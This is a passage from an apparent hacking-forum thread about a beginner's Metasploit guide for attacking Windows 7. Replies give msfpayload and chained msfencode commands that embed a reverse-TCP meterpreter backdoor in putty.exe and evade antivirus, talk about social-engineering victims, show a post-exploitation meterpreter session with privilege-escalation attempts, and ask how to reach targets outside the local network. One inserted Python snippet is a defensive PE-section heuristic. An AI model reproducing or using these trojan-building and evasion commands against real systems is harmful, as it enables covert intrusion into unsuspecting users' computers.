
Thread: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

  1. #11
    Senior Member
    Join Date
    Jan 2010
    Posts
    173

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    So you like to use truecrypt.exe, nice lol, one of a few that work nicely.

    For a great tutorial series on Metasploit, Google "metasploit megaprimer securitytube"; best I've seen.
    Last edited by pentest09; 09-24-2010 at 01:34 PM.

  2. #12
    Just burned his ISO
    Join Date
    Jun 2010
    Posts
    15

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    Wouldn't hurt to include a link to Metasploit Unleashed at the bottom of the guide, to point beginners to the right place for their follow-up learning.

    Metasploit Unleashed - Mastering the Framework

  3. #13
    Just burned his ISO
    Join Date
    Sep 2007
    Posts
    11

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    Quote Originally Posted by farshadbat View Post
    Hi, I'm sorry for my amateur question. I'm new to Metasploit.

    I don't get this section:
    Code:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=[YOUR IP ADDRESS INT./EXT.] LPORT=[YOUR PORT] R | ./msfencode -c [NUMBER - How many times it will be encoded] -e x86/shikata_ga_nai -x /root/[SOFTWARE_NAME].exe -t exe > /root/[NEW_SOFTWARE_NAME].exe
    What EXE do I need?

    You need to find an exe file like putty or tcpview to encode the backdoor into.

  4. #14
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    Quote Originally Posted by xibit1987 View Post
    About backdooring an exe: I already have that in the "Create the exploit" section, the first code box in the guide. I use encode there and I also explain a LITTLE bit about the error you can get. I didn't go directly into details, but if that's what you guys want I can do that too. By the way, have any of you got the "-k" option to work yet, so that the exe you're backdooring still works? If yes, please post an example command.

    And again, I'm a beginner, so please correct me if I have understood anything wrong or explained anything in the wrong way!

    I thank you all for the kind words

    Actually, the -k option is what I am specifically referring to with my backdooring comment. As this is a client-side attack, tricking/social engineering the user is everything, so keeping the backdoored exe working can be key sometimes. Not all executables work as templates with the -k option, or possibly even as templates in the first place.

    Also bear in mind that this example code did not pass my current Avast. I am moving this week and don't have time to re-work the encoding so it does. It did formerly; however, the executable made with this multi-encoding command string has been uploaded to VirusTotal for testing, as the command was really just a simple test of running multiple encoders. I also developed this particular string some time ago.

    The code in this case is simply an example that, yes, multiple encoders can still be used when backdooring an exe while still keeping the template exe working.

    Code:
    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.25.26 LPORT=1417 R | \
      msfencode -e x86/shikata_ga_nai -c 3 -t raw | \
      msfencode -e x86/call4_dword_xor -c 4 -t raw | \
      msfencode -e x86/fnstenv_mov -c 5 -t raw | \
      msfencode -e x86/countdown -c 4 -t raw | \
      msfencode -e x86/shikata_ga_nai -c 16 -t exe -x /root/putty.exe -k -o /root/putty-backdoored.exe
    Again, when running it for this post, Avast did detect the exe and disposed of it. With Avast off I am able to get a meterpreter session started. Of course, modify the IP address and port as needed.
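    The post above is about payload injection into a template exe. As an added example from the defender's side (not code from this thread or from Metasploit), the following Python heuristic inspects a PE32 section table for two anomalies commonly associated with injected code: a section that is both writable and executable, and an entry point that lands outside the first code section. The PE images and the section name `.xtra` are constructed here for illustration, and the heuristics are an assumption about typical indicators, not a description of what msfencode specifically produces.

```python
# Added example (not from the thread): heuristic PE32 section-table check for
# indicators that often accompany injected code. Sample images are constructed.
import struct

SCN_CODE, SCN_EXEC, SCN_READ, SCN_WRITE = 0x20, 0x20000000, 0x40000000, 0x80000000

def parse_sections(data):
    """Return (entry_rva, [(name, va, vsize, characteristics), ...]) from a PE32 image."""
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsec = struct.unpack_from("<H", data, pe_off + 6)[0]       # NumberOfSections
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]  # SizeOfOptionalHeader
    entry = struct.unpack_from("<I", data, pe_off + 24 + 16)[0]  # AddressOfEntryPoint
    secs, off = [], pe_off + 24 + opt_size                     # start of section table
    for _ in range(nsec):
        name, vsize, va = struct.unpack_from("<8sII", data, off)
        chars = struct.unpack_from("<I", data, off + 36)[0]    # Characteristics
        secs.append((name.rstrip(b"\0").decode(errors="replace"), va, vsize, chars))
        off += 40
    return entry, secs

def suspicious_sections(data):
    """Return a list of findings; an empty list means neither heuristic fired."""
    entry, secs = parse_sections(data)
    findings = [f"section {n} is writable and executable"
                for n, _, _, ch in secs if ch & SCN_EXEC and ch & SCN_WRITE]
    code = [s for s in secs if s[3] & SCN_EXEC]
    if code:
        name, va, vsize, _ = code[0]
        if not (va <= entry < va + vsize):
            findings.append(f"entry point 0x{entry:x} is outside first code section {name}")
    return findings

def build_pe(sections, entry):
    """Constructed minimal PE32: DOS header, COFF header, optional header, section table."""
    dos = bytearray(64); dos[:2] = b"MZ"; struct.pack_into("<I", dos, 0x3C, 64)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x102)
    opt = bytearray(224); struct.pack_into("<H", opt, 0, 0x10B); struct.pack_into("<I", opt, 16, entry)
    table = b"".join(struct.pack("<8sIIIIIIHHI", n.encode(), vs, va, vs, 0, 0, 0, 0, 0, ch)
                     for n, va, vs, ch in sections)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table

# Constructed samples: a clean layout and one with an extra RWX section holding the entry point.
CLEAN = build_pe([(".text", 0x1000, 0x2000, SCN_CODE | SCN_EXEC | SCN_READ),
                  (".data", 0x3000, 0x1000, SCN_READ | SCN_WRITE)], entry=0x1234)
INJECTED = build_pe([(".text", 0x1000, 0x2000, SCN_CODE | SCN_EXEC | SCN_READ),
                     (".data", 0x3000, 0x1000, SCN_READ | SCN_WRITE),
                     (".xtra", 0x4000, 0x1000, SCN_EXEC | SCN_READ | SCN_WRITE)], entry=0x4010)

if __name__ == "__main__":
    for label, img in (("clean", CLEAN), ("injected", INJECTED)):
        print(label, suspicious_sections(img) or ["no findings"])
```

    Packers and some legitimate installers also produce such layouts, so the findings are triage hints rather than verdicts.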

  5. #15
    Just burned his ISO
    Join Date
    Jul 2010
    Posts
    4

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    I know this question lies totally outside the topic, but do the classic Metasploit payloads and exploits work against Win 7 target platforms?

  6. #16
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    Quote Originally Posted by captainjackrana View Post
    I know this question lies totally outside the topic, but do the classic Metasploit payloads and exploits work against Win 7 target platforms?
    What is a classic payload and/or exploit? If you mean something designed for WinXP, then no, they most likely do not.
    It would be a good idea for you to read up on the MSFU.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  7. #17
    Good friend of the forums comaX's Avatar
    Join Date
    Feb 2010
    Location
    Paris, France
    Posts
    338

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    Hi, very useful tutorial! I used to use SET for simplicity, but this is just great, and not that hard.

    I have some questions though:
    - Everything runs smoothly when on the same network, but how can I use it over the internet? I have two networks, two PCs. When I try this using my public IP, it just fails and Metasploit binds to 0.0.0.0... I tried allowing connections from outside through specific ports in my router, but same result...

    Any ideas, people?

    Edit: never mind my post, it's running smoothly! I didn't know 0.0.0.0 meant all interfaces. As for the port forwarding not working, it was just some router FW I got rid of, and it was the right way to do it!

  8. #18
    Member
    Join Date
    Feb 2010
    Location
    MTI3LjAuMC4x
    Posts
    90

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    I didn't think getsystem worked on x64 Windows 7? I also get a lot of BSODs in my testing when getting system privs... I don't understand how you did that?

    I don't see this even working on x32.

    Code:
    meterpreter > sysinfo
    Computer: WIN-MSUB6TKFKFA
    OS      : Windows 7 (Build 7600, ).
    Arch    : x86
    Language: en_US
    meterpreter > ps
    ...
    608   explorer.exe         x86   1        WIN-MSUB6TKFKFA\user  C:\Windows\Explorer.EXE
    meterpreter > migrate 608
    [*] Migrating to 608...
    [*] Migration completed successfully.
    meterpreter > getprivs
    ============================================================
    Enabled Process Privileges
    ============================================================
      SeShutdownPrivilege
      SeChangeNotifyPrivilege
      SeUndockPrivilege
    meterpreter > getsystem -t 1
    [-] priv_elevate_getsystem: Operation failed: Access is denied.
    meterpreter > getsystem -t 2
    [-] priv_elevate_getsystem: Operation failed: Access is denied.
    meterpreter > getsystem -t 3
    [-] priv_elevate_getsystem: Operation failed: Access is denied.
    meterpreter > getsystem -t 4
    ^C[-] Error running command getsystem: Interrupt
    Update: this is UAC blocking access; with UAC disabled this is no longer an issue. I am still stuck on how to disable UAC..?
    Last edited by spudgunman; 12-01-2010 at 06:53 AM.

  9. #19
    Just burned his ISO
    Join Date
    Dec 2010
    Posts
    4

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    Very good tut and thanks for sharing this nice work.

  10. #20
    Just burned his ISO
    Join Date
    Sep 2010
    Posts
    6

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    Hi everyone. I'm Italian so my English isn't correct xD
    So... I have a problem with meterpreter: when I create it, it's ok.
    In LHOST I set my external address and in msfconsole my internal address, but when another computer (not in my LAN) opens the file nothing happens; msfconsole receives nothing. Why?
    I do everything correctly but... I don't know.
    Can anyone help me?
    Thanks

    Again: sorry for my bad English.

    TheAppleMan
